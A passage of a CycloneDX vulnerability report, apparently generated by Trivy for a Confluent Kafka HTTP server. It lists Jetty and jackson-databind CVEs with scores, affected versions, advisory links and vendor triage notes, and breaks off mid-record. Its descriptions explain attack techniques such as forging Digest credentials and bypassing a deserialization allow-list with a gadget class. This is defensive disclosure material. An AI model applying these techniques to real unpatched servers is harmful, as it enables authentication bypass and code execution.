{
  "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:95b234bc-d421-4035-8fc9-9567ccad0b0c",
  "version": 1,
  "metadata": {
    "timestamp": "2026-08-20T01:06:01+00:00",
    "tools": {
      "components": [
        {
          "type": "application",
          "manufacturer": {
            "name": "Aqua Security Software Ltd."
          },
          "group": "aquasecurity",
          "name": "trivy",
          "version": "0.69.3"
        }
      ]
    },
    "component": {
      "bom-ref": "61e9e665-cdcd-48a7-93b9-42e915599dc4",
      "type": "application",
      "supplier": {
        "name": "Confluent"
      },
      "name": "confluent-ce-kafka-http-server",
      "version": "8.0.7-1",
      "properties": [
        {
          "name": "aquasecurity:trivy:SchemaVersion",
          "value": "2"
        }
      ]
    }
  },
  "components": [],
  "dependencies": [],
  "vulnerabilities": [
    {
      "id": "CVE-2026-10050",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        173,
        303
      ],
      "description": "In Eclipse Jetty, the Digest authentication server-side component uses ISO-8859-1 to encode the password as bytes.\n\n\n\nThis was done because the initial specification for HTTP did not specify explicitly a charset, and it was assumed to be ISO-8859-1 for historical reasons.\n\n\n\nIf the password contains characters that cannot be represented in ISO-8859-1, they are silently replaced by `?`. This happens with passwords that contain Chinese, Cyrillic or Greek characters, for example: `\u03b1\u03b2123` converts to `??123`.\n\n\n\nAn attacker can send a request with a digest `Authorization` header crafted with a password made of only `?` characters; the server would match any password of the same length that contains non-ISO-8859-1 characters.\n\n\n\nRecent HTTP Digest [RFC-7616](https://datatracker.ietf.org/doc/html/rfc7616) supports a `charset` parameters that defaults to UTF-8 that allows for correct encoding/decoding of passwords.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-security to version 9.4.63, 10.0.31, 11.0.31, 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10050"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10050"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/4bcdbc7db387ce9e20e2c7571a7250280466221d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/d0bb829ccecbf19e3ad3d32f2649b2800f01222d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/15136"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15160"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15183"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-2fvj-hgj9-j2gr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/120"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10050"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10050"
        }
      ],
      "published": "2026-08-04T11:22:43+00:00",
      "updated": "2026-08-08T00:38:56+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@12.0.35",
          "versions": [
            {
              "version": "12.0.35",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b1f654b4-1c7f-443c-a940-cdd18f2c6252"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fbde6740-23b8-4eb6-8959-4dbdafc54df8"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#cfc14f28-bbc2-49ec-b8b0-a3fae0da4e57"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#f02c2cd6-af09-4767-8052-bbf51296379a"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e68bcc5f-4b1b-461d-9d86-ea2c9388c4b1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#fc9d50ca-4971-4228-b44a-b009cb92dbf4"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#f83cb279-f6ee-4447-965f-e897813e1805"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f2ce8c37-0e3f-44cc-8bb5-53be668ea86f"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#db687835-0753-4aff-b5f6-142a0f984503"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#9eaa9856-6351-4ac8-9ad5-e3e0aa5bcb3c"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-10051",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        200
      ],
      "description": "In Eclipse Jetty, a first HTTP/1.1 request with trailers causes the server to retain the trailers in subsequent requests performed over the same connection.\nSubsequent request that do not have trailers report the trailers of the first request.\nSubsequent request that do have trailers report the union of trailers of the first request and the current request.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10051"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10051"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/72206b3ea623cf7ed8729b47a83ee628ff10e8eb"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/dc27e8d3ab743fe27935ea2d8c41756eb6c5bae9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15162"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15163"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-f4v5-65jj-pcr2"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/119"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10051"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10051"
        }
      ],
      "published": "2026-07-14T09:16:39+00:00",
      "updated": "2026-07-14T18:41:52+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.35",
          "versions": [
            {
              "version": "12.0.35",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#4a2fe5e7-f51a-4be3-9d49-0fa697b3e0e4"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#ebf53e59-7945-49ef-ac48-3c69699db198"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#eef8515e-00eb-4213-b288-f47aaa6a8fde"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#fe2e5715-6d15-4e85-9307-8b34a7c96795"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#bf2b68e9-fee3-4200-82fc-da36866bc2a7"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ebd01453-210a-49cb-bd8c-dbd0ad36bdc3"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ca4f1e99-7223-4b6e-99b1-c20eaf4863ef"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fed01baf-c6de-4777-9a19-33efec811965"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#d2371509-de4e-4e44-9fda-900acae3400c"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#bd06a6f5-cf4e-456b-be3d-3e5cb3f304ee"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-54512",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184,
        502
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, jackson-databind's PolymorphicTypeValidator (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e. the type ID string contains <), DatabindContext._resolveAndValidateGeneric() validates only the raw container class name (the substring before <) against the configured PTV. If the container type is approved, the method parses the full canonical type string via TypeFactory.constructFromCanonical() and returns the fully parameterized type without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization. An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container \u2014 for example java.util.ArrayList<com.evil.Gadget> when only java.util.ArrayList is allow-listed. The container passes the PTV check; com.evil.Gadget is loaded via Class.forName(name, true, loader), instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 3.1.4, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54512"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-40895.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:43400"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/434d6c511de7fdd9872f29157aafb6162d12d8d5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5988"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-j3rv-43j4-c7qm"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54512.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54512"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54512"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T21:01:36+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Confluent Platform does not deserialize untrusted JSON using class-based polymorphic typing; the only class-based sites are the Trogdor test tool (not in the deployed runtime) and the OAuth JwtIssuer selected by trusted broker configuration, so the PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54513",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray() allowlists any array type based only on clazz.isArray(), without validating the array's component (element) type against the configured allowlist. A PTV built with allowIfSubTypeIsArray() plus an explicit concrete-type allowlist therefore still permits EvilType[] even though EvilType is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54513"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43218"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44062"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44063"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44271"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48095"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54622"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54513"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-40895.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:43218"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/01d1692c8d0ed03e51a0e3c4f8a9e6908e4931e5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/24529da29fdf46ff94ca38de9ebf31cd188f5e8e"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5981"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5983"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5984"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rmj7-2vxq-3g9f"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54513.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54513"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54513.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54513"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-08-14T13:19:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
